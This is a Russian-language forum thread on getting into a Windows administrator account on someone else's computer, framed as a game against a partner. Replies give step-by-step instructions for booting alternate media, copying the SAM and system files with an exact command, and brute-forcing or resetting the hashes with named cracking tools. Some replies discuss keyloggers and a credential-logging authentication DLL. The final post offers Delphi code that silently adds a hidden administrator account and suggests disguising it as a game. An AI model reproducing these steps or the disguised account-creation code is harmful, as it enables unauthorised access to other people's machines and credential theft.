проинсталлировать на Флашку Брут Форс, и просканить на взлом пароля учетной записи админа.
Что имеется в виду? Если импорт хэшей паролей с локальной машины - не выйдет без админовских прав.
И что за зверь такой - "Брут форс"? И роль флэшки во всей этой истории?
Реально, загрузившись с CD с любой оси (DOS, Винд), слямзить файлы sam и system. Затем перегрузиться в родной винд., с пом. прогр. Saminside, например, импортировать из этих файлов хэши (тут уже не нужно админовских прав) и подобрать пароль. Поищи по форуму, это уже 100 раз обсуждалось. Затем с гордостью показать все это парню. Только шпионить не надо, а то очень обидно, когда за тобой шпионят
Всем привет!!! мне надо всё это переварить, так как сейчас ночь на дворе,не соображаю! А вот мысль возникла, а возможно ли узнать пароль администратора, через клавиатурного шпиона? Вот одно смущает там стоит KIS 2006! А шпионить я за ним не буду, я просто если получу доступ сменю пароль на свой! и усмехнусь! У нас типа игра! Кто кого!
<center>Реально, загрузившись с CD с любой оси (DOS, Винд), слямзить файлы sam и system. Затем перегрузиться в родной винд., с пом. прогр. Saminside, например, импортировать из этих файлов хэши (тут уже не нужно админовских прав) и подобрать пароль.</center> Jul_i легко говорить когда умеете, а где подробней можно узнать?
Файлы Sam и System (без расширений) лежат в ...\windows\system32\config. Но из под той же винды, частью которой они являются они не откроются и не перепишутся, т.к. уже открыты системой. Нужно загрузиться с другой системы. Вот тут важно, какая файл. сист. Посмотреь - в "Мой комп." свойствах дисков. Если Фат-32, то можно грузиться с Досовской дискеты, хоть той, что создается в винде. Если NTFS, то ссылки на диски с поддержкой ее здесь http://www.securitylab.ru/forum//search.asp?KW=icwt&SM=1&SI= PT&FM=0&OB=1
А если просто поменять пароль, не спрашивая старого, то ERD commander (если найдешь его образ) или скачать Winternals Administrators Pak http://www.sonic2k.com/apps?Winternals.Administrators.Pak.v4 .2.WinNT2kXP2k3-SSG.rar (примерно 75М) и сделать загрузочный диск с ERD. Там есть утилита Locksmith, которой просто меняешь пароль.
Брут Форс - это метод взлома пароля посредством словарного либо последовательного перебора. Стар как наш мир и неэффективен в домене. А на локальной колымаге хляет. А флеш память нужна для создания самостоятельного раздела, с которого можно будет запустить проинсталлированный брут форс. И импорт хешей не нужен - он покажет пароль графически.
Единственная загвоздка - NTFS. Она может не позволить приложению открыться.
По крайней мере, NHT Leave CD плюет на раздельный доступ пользователей к папкам, установленный в родной винде.
О брутфорсе на локальной машине - он наверное применяется не от хорошей жизни, когда нет возможности импортировать хэши. Какова скорость по сравнению с перебором, когда были импортированы хэш заранее? Напр. PwSEX на Celeron 1,7GHz 3600 000 п/сек по импортир. NTLМ хэшам.
Bart Pe (писал выше) работает с файловой системой NTFS версии 3.1 включительно. Проверить свою версию можно командой C:\fsutil fsinfo ntfsinfo C:, то есть поддерживаются все команды типа копирования, перемещения, переименования, удаления. Файли и директории, зашифрованные операционной системой расшифровке (обычной) не подлежат. Для расшифровки таких файлов нужен пароль (не новый а старый). На диске имеется файловый менеджер, способный работать с диском, можно использовать и свой, предварительно скопировав его на диск. Дальше, про программы для расшифровки паролей, их можно также переписать на загрузочный диск. Существуют специальные утилиты, позволяющие редактировать или сбрасывать пароли пользователей Windows NT/2000/XP. Принцип работы большинства из них заключается в загрузке минимальной версии альтернативной операционной системы, например DOS, Linux, Batr Pe или любая другая, на которую глаз положите. Пример подобной утилиты можно найти по этому адресу: http://home.eunet.no/~pnordahl/ntpasswd/ Инструкции по работе, так же как файлы для создания загрузочного диска Linux, доступны на этом же сайте. Можно переписать файлы config и SAM и попытаться расшифровать пароли, которые в них хранятся, с помощью специальных утилит сторонних производителей. Программы для расшифровки паролей: LC4 или Proactive Windows Security Explorer. Желательно иметь: 1. Доступ к другому компьютеру. 2. Как минимум две пустые дискеты или загрузочный (подготовленный) CD и дискету для сброса инфы. 3. Архиватор, рассчитанный на работу с командной строкой, например, RAR. 4. Загрузочный диск DOS или Windows 98 (имидж необходимого диска можно получить по адресу http://www.bootdisk.com/) или минимальная версия Linux (например, Knoppix). Необходимость в загрузочных дисках отпадает, если вы можете просто подключить к другому компьютеру свой жесткий диск. Если вы используете загрузочный диск DOS, а разделы на вашем жестком диске используют файловую систему NTFS, то для доступа к ним вам понадобится программа, позволяющая под управлением DOS просматривать разделы в формате NTFS, например, NTFSDOS. 5. Программа для получения паролей - Proactive Windows Security Explorer (бэта-версия этой программы является бесплатной), бесплатная версия LC4 очень ограничена (Яндеск поможет с ключами). 1. Если на жестком диске есть разделы в формате NTFS, копируем файл NTFSDOS на загрузочную дискету. 2. Скопируйте на загрузочную дискету архиватор (RAR). 3. Загрузите компьютер с этой дискеты. Если есть разделы с NTFS, наберите команду NTFSDOS, эта программа покажет, какая буква присвоена вашему системному диску, ее и нужно будет использовать вместо буквы C в следующем пункте. 4. Поместите в архив системные файлы с паролями. Например, если вы используете архиватор rar32, соответствующая команда будет выглядеть так: Rar32 a -v a:systemandsam c:windowssystem32configsystem c:windowssystem32configsam Если файлы не поместятся на одну дискету, архиватор попросит вас вставить вторую. Если есть загрузочный CD, все это не потребуется, просто зайдете в необходимые каталоги и скопируете на дискету нужные файлы. Дальше о подборе: Каждая из выбранных вами программ выведет список обнаруженных в файле SAM учетных записей. Выберите те из них, пароли к которым вам нужно определить. Если вы используете Proactive Windows Security Explorer, выберите Atack type: Brute-force. Если вы использовали в пароле только цифры, отметьте пункт all digits (0-9). Начните процесс подбора пароля с помощью команды из меню Recovery. Подбор пароля может длиться от 10 минут до нескольких часов, а то и нескольких дней, и может закончиться неудачно. Особенно, если в пароле используются буквы в различных регистрах, цифры и специальные символы. Для справки о прямом переборе: если используется 128 битное шифрование, пароль состоит к примеру из 20 символов, в пароле есть буквы только латинские и еще есть цифры, то 34 в 20 степени = 4261655511456885005249781170176 вариантов (один из которых правильный), при скорости перебора в миллион паролей в секунду (мой делает 470 тыс.) уйдет 135136209774761701 лет. При увеличении длины пароля и вариантов его написания (регистр, спецсимволы) время перебора увеличивается. Если сделал ошибку в расчетах, то ups! Но где то примерно так. Если использовались возможности утилиты syskey, то про все вышеописанное можно забыть...
Ice Dog пишет: Если использовались возможности утилиты syskey, то про все вышеописанное можно забыть...
не все Syskey не помеха для Saminside, того же Proactive windows secyrity explorer (или, как еще называют, PWSEX), LCP и .... Из менялок - для ERD commanderа
Вариант для особо ленивых: http://www.loginrecovery.com/ - скачиваешь у них загрузочную дискетку, загружаешься с нее, идешь пить чай. Прога забирает хэши паролей, все - автоматически, даже комп выключится сам. Работает с любыми файл. системами, даже с EFS дисками. Затем отсылаешь им эти хэши и они подбирают и высылают пароль.
А еще лучше им ничего не высылать, а самому затем подобрать пароли (тем более, что у них может не быть rainbow tables для паролей с русскими символами).
Nimda Клавиатурный шпион? Нет, т.к. он загрузится ПОСЛЕ аутентификации юзера. Есть замена стандартной dll отвечающей за аутентификацию: она делает всё что и стандартная + сохраняет набранное в файл. Тока детектится всеми антивирями давно
Но если нужно тока пасс поменять - ERD Commander тебе в помощь
mzzz
Цитата
Во первых, я не думаю, что это получится. Во вторых, что даст нам право к диску? Цель наша - пароль админа.
А почему не должно получиться? А даст это нам возможность скопировать sam и system файлы.
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
Я тут подумал может проще закодить (например на Делфи) прогу: ________________________________________________ program Hack;
uses Windows;
var reg : Tregistry;
begin nbsp; nbsp; nbsp;//Создаём пользователя с полными правами winexec(net user 31337 ruzone /add,sw_hide); winexec(net localgroup Администраторы 31337 /add,sw_hide);
end. _________________________________________________ Естественно что это должно запускаться с правами админа, как вариант это можно замаскировать под игрульку и бросить куда-нибудь на видное место.